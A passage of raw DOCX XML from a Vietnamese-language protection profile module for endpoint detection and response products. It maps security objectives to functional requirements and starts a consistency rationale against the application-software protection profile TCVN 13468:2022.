          <w:p w14:paraId="4E857634" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ĐẶC ĐIỂM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w14:paraId="28A043E8" w14:textId="77777777" w:rsidTr="00D448F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2869" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="390C56F9" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>O.ACCOUNTABILITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29715C02" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FAU_GEN.1/EDR, FIA_AUT_EXT.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4188" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE3927D" w14:textId="1576DB82" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module bao gồm FAU_GEN.1/EDR để đảm bảo rằng TOE cung cấp trách nhiệm giải trình thông qua việc tạo các bản ghi kiểm toán cho các sự kiện liên quan đến </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:t>an toàn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4177B67A" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module bao gồm FIA_AUT_EXT.1 để cung cấp cơ chế xác thực người dùng </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:lastRenderedPageBreak/>
              <w:t>quản lý để có thể được liên kết với hành động của người dùng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w14:paraId="2B0D4ECC" w14:textId="77777777" w:rsidTr="00D448F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2869" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2759F01A" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:lastRenderedPageBreak/>
              <w:t>O.EDR_MANAGEMENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="405CE099" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FAU_ALT_EXT.1, FAU_COL_EXT.1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46212E8A" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FIA_AUT_EXT.1, FIA_PWD_EXT.1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02033FA0" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FMT_SMF.1/ENDPOINT,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AC8848" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FMT_SMF.1/HOST, FMT_SMR.1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62F523F9" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FMT_SRF_EXT.1, FMT_TRM_EXT.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7171F4ED" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>(Đối tượng)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4188" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BCE1066" w14:textId="1D705B29" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module bao gồm FAU_ALT_EXT.1 để hỗ trợ quản lý bằng cách cung cấp chức năng cho người dùng được ủy quyền tương tác với dữ liệu liên quan đến </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:t>an toàn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> được cung cấp cho TSF.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B57ECE6" w14:textId="799F5DBC" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module bao gồm FAU_COL_EXT.1 để hỗ trợ quản lý bằng cách xác định dữ liệu liên quan đến </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:t>an toàn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> được thu thập bởi TSF. PP-Module bao gồm FIA_AUT_EXT.1 để xác định cách TSF xác thực người dùng </w:t>
            </w:r>
            <w:r w:rsidR="00217303" w:rsidRPr="00204C5F">
              <w:t>quản trị</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> để giới hạn các chủ thể có thể thực thi các chức năng quản lý trên TOE.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27281736" w14:textId="76F41EF5" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module bao gồm FIA_PWD_EXT.1 để xác định các yêu cầu thành phần cho Yếu tố xác thực mật khẩu nhằm đảm bảo rằng người dùng </w:t>
            </w:r>
            <w:r w:rsidR="00217303" w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">không </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">được ủy quyền </w:t>
            </w:r>
            <w:r w:rsidR="00217303" w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">thì </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">không thể truy cập các chức năng </w:t>
            </w:r>
            <w:r w:rsidR="00217303" w:rsidRPr="00204C5F">
              <w:t>quản trị</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> được bảo vệ mà không được phép.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="480F3C92" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>PP-Module bao gồm FMT_SMF.1/ENDPOINT để xác định các chức năng quản lý có thể được thực hiện để kiểm soát hành vi của TSF và các vai trò quản lý được phép thực hiện các chức năng đó.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B939199" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>PP-Module bao gồm FMT_SMF.1/HOST để xác định các chức năng quản lý có thể được thực hiện nhằm kiểm soát hành vi của Tác nhân máy chủ được kết nối với TOE và các vai trò quản lý được ủy quyền để thực hiện các chức năng đó.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="374544EB" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module bao gồm FMT_SMR.1 để xác định các vai trò quản lý mà TSF hỗ trợ </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:lastRenderedPageBreak/>
              <w:t>sao cho các chức năng quản lý của nó có thể được phân tách theo vai trò.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7771B6E5" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>PP-Module bao gồm FMT_SRF_EXT.1 để xác định các chức năng khắc phục khả dụng cho người dùng được ủy quyền để đưa ra các hành động khắc phục trên hệ thống có Tác nhân máy chủ được kết nối.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0782413C" w14:textId="62BD4A0E" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module bao gồm FMT_TRM_EXT.1 để cung cấp khả năng tùy chọn nhằm đảm bảo tính toàn vẹn của các lệnh và chính sách quản lý được cấp cho </w:t>
            </w:r>
            <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
              <w:t>Tác nhân máy chủ</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> bên ngoài thông qua việc sử dụng chữ ký số.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w14:paraId="27BA7305" w14:textId="77777777" w:rsidTr="00D448F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2869" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3894C432" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:lastRenderedPageBreak/>
              <w:t>O.PROTECTED_TRANSIT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E379512" w14:textId="34310075" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="00D448F0" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">FCS_DTLSS_EXT.1 </w:t>
            </w:r>
            <w:r w:rsidR="004E5EB8" w:rsidRPr="00204C5F">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>từ gói TLS</w:t>
            </w:r>
            <w:r w:rsidR="004E5EB8" w:rsidRPr="00204C5F">
              <w:t>), FCS_DTLSC_EXT.1 (</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>từ gói TLS</w:t>
            </w:r>
            <w:r w:rsidR="004E5EB8" w:rsidRPr="00204C5F">
              <w:t>), FCS_HTTPS_EXT.1 (</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>từ Hồ sơ bảo vệ cơ sở</w:t>
            </w:r>
            <w:r w:rsidR="004E5EB8" w:rsidRPr="00204C5F">
              <w:t>), FCS_TLSC_EXT.1 (</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>từ gói TLS</w:t>
            </w:r>
            <w:r w:rsidR="004E5EB8" w:rsidRPr="00204C5F">
              <w:t>), FCS_TLSC_EXT.2 (</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>từ gói TLS</w:t>
            </w:r>
            <w:r w:rsidR="004E5EB8" w:rsidRPr="00204C5F">
              <w:t>), FCS_TLSS_EXT.1 (</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>từ gói TLS</w:t>
            </w:r>
            <w:r w:rsidR="004E5EB8" w:rsidRPr="00204C5F">
              <w:t>), FCS_TLSS_EXT.2 (</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>từ gói TLS</w:t>
            </w:r>
            <w:r w:rsidR="004E5EB8" w:rsidRPr="00204C5F">
              <w:t>), FPT_ITT.1, FTP_TRP.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4188" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F7E5739" w14:textId="77777777" w:rsidR="00217303" w:rsidRPr="00204C5F" w:rsidRDefault="00217303" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>PP-Module tham chiếu FCS_HTTPS_EXT.1 từ PP cơ sở cho các trường hợp khi HTTPS được sử dụng làm kênh liên lạc đáng tin cậy.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755EA462" w14:textId="19F1E22B" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module tham chiếu FCS_DTLSC_EXT.1 từ </w:t>
            </w:r>
            <w:r w:rsidR="00D448F0" w:rsidRPr="00204C5F">
              <w:t>g</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">ói TLS cho các trường hợp khi DTLS với tư cách là </w:t>
            </w:r>
            <w:r w:rsidR="00217303" w:rsidRPr="00204C5F">
              <w:t>máy khách</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> được sử dụng làm kênh liên lạc đáng tin cậy.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AD5436E" w14:textId="63C039ED" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module tham chiếu FCS_DTLSS_EXT.1 từ </w:t>
            </w:r>
            <w:r w:rsidR="00D448F0" w:rsidRPr="00204C5F">
              <w:t>g</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>ói TLS cho các trường hợp khi DTLS làm máy chủ được sử dụng làm kênh liên lạc đáng tin cậy.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7288A84D" w14:textId="623EAC25" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module tham chiếu FCS_TLSC_EXT.1 từ Gói TLS cho các trường hợp khi </w:t>
            </w:r>
            <w:r w:rsidR="00217303" w:rsidRPr="00204C5F">
              <w:t>TLS được sử dụng làm kênh liên lạc đáng tin cậy trên máy khách</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FAD8DE7" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module tham chiếu FCS_TLSC_EXT.2 từ Gói TLS cho các </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:lastRenderedPageBreak/>
              <w:t>trường hợp khi TOE sử dụng triển khai máy khách TLS hỗ trợ xác thực lẫn nhau.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4029C18B" w14:textId="46DF2B25" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>PP-Module tham chiếu FCS_TLSS_EXT.1 từ Gói TLS cho các trường hợp khi TLS được sử dụng làm kênh liên lạc đáng tin cậy</w:t>
            </w:r>
            <w:r w:rsidR="00217303" w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> trên máy chủ</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CF2B742" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>PP-Module tham chiếu FCS_TLSS_EXT.2 từ Gói TLS cho các trường hợp khi TOE sử dụng triển khai máy khách TLS hỗ trợ xác thực lẫn nhau.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266D1693" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>PP-Module bao gồm FPT_ITT.1 để xác định kênh tin cậy nội bộ mà TSF sử dụng để giao tiếp với các Tác nhân máy chủ được kết nối cũng như các giao thức truyền thông được sử dụng để thiết lập các kênh tin cậy này.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C46DF0" w14:textId="00A7418D" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>PP-Module bao gồm FTP_TRP.1 để xác định các giao thức truyền thông được sử dụng để hỗ trợ quản trị TSF từ xa an toàn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12F2ECAA" w14:textId="59C5F3A8" w:rsidR="00D448F0" w:rsidRPr="00204C5F" w:rsidRDefault="00D448F0" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc137476361"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đặc điểm về tính nhất quán</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="7325CB99" w14:textId="3EBB9436" w:rsidR="00D448F0" w:rsidRPr="00204C5F" w:rsidRDefault="00D448F0" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>10.1 Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544EE6AD" w14:textId="7199EE0E" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="004E5EB8" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1.1 Tính nhất quán của chủng loại TOE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E8E47" w14:textId="7BBBEAFA" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t>Nếu PP-Modu</w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:t>le này được sử dụng để mở rộng Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">, chủng loại TOE cho TOE tổng thể vẫn là một ứng dụng dựa trên phần mềm. Ranh giới TOE đơn giản được mở rộng để bao gồm chức năng EDR được tích hợp trong ứng dụng sao cho chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> bổ sung được yêu cầu trong phạm vi của TOE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516CBF57" w14:textId="13C44E7C" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1.2 Tính nhất quán của </w:t>
      </w:r>
      <w:r w:rsidR="005A544E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>định nghĩa các vấn đề an toàn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F55CD9" w14:textId="34AA9D95" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Các mối đe dọa, giả định và OSP được xác định bởi PP-Module này bổ sung cho những điều được xác định trong </w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:t>TCVN 13468:2022 Công nghệ thông tin – Các kỹ thuật an toàn – Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> như sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2988"/>
        <w:gridCol w:w="7020"/>
      </w:tblGrid>
      <w:tr w:rsidR="004624D5" w:rsidRPr="00204C5F" w14:paraId="5B185874" w14:textId="77777777" w:rsidTr="00EA6307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2988" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06F7CE6C" w14:textId="77777777" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Mối đe dọa, Giả định, OSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB6B3B0" w14:textId="77777777" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Đặc điểm về tính nhất quán</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004624D5" w:rsidRPr="00204C5F" w14:paraId="48C06174" w14:textId="77777777" w:rsidTr="00EA6307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2988" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50063B2C" w14:textId="77777777" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:lastRenderedPageBreak/>
              <w:t>T.MISCONFIGURATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A18E971" w14:textId="5AB7CB25" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>Mối đe dọa này phù hợp với Hồ sơ bảo vệ cơ sở vì đây là một ví dụ cụ thể về mối đe dọa T.LOCAL_ATTACK được xác định ở đó. Trong trường hợp này, cuộc tấn công cục bộ nhằm thay đổi hành vi của chính ứng dụng mộ</w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>t cách có chủ ý</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> thay vì sử dụng ứng dụng như một phương pháp để tấn công nền tảng hệ điều hành.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004624D5" w:rsidRPr="00204C5F" w14:paraId="37397F65" w14:textId="77777777" w:rsidTr="00EA6307">
        <w:trPr>
          <w:trHeight w:val="481"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2988" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17676AF9" w14:textId="77777777" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>T.CREDENTIAL_REUSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="757F7F09" w14:textId="77777777" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>Mối đe dọa này là một ví dụ cụ thể về T.NETWORK _EAVESDROP được định nghĩa trong Hồ sơ bảo vệ cơ sở.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004624D5" w:rsidRPr="00204C5F" w14:paraId="74733DA6" w14:textId="77777777" w:rsidTr="00EA6307">
        <w:trPr>
          <w:trHeight w:val="251"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2988" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33D91ABC" w14:textId="77777777" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>A.CONNECTIVITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AE37E5B" w14:textId="77777777" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
